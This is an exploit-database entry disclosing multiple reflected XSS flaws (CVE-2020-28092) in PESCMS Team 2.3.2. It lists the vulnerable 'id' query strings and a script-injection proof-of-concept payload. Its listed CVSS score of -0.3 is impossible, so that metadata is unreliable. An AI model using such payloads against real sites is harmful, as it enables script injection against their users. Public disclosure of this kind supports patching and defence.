Exploit for PESCMS TEAM 2.3.2 Cross Site Scripting CVE-2020-28092

Name: Exploit for PESCMS TEAM 2.3.2 Cross Site Scripting CVE-2020-28092
Rating: 5 (534 reviews)

2020-11-19 | CVSS -0.3

## https://sploitus.com/exploit?id=PACKETSTORM:160128
# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS   
# Date: 2020-11-18  
# Exploit Author: icekam  
# Vendor Homepage: https://www.pescms.com/  
# Software Link: https://github.com/lazyphp/PESCMS-TEAM  
# Version: PESCMS Team 2.3.2  
# CVE: CVE-2020-28092  
  
PESCMS Team 2.3.2 has multiple reflected XSS via the id  
  
parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=  
  
please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6  
  
now I input payload :  
  
"><ScRiPt>alert(1)</ScRiPt>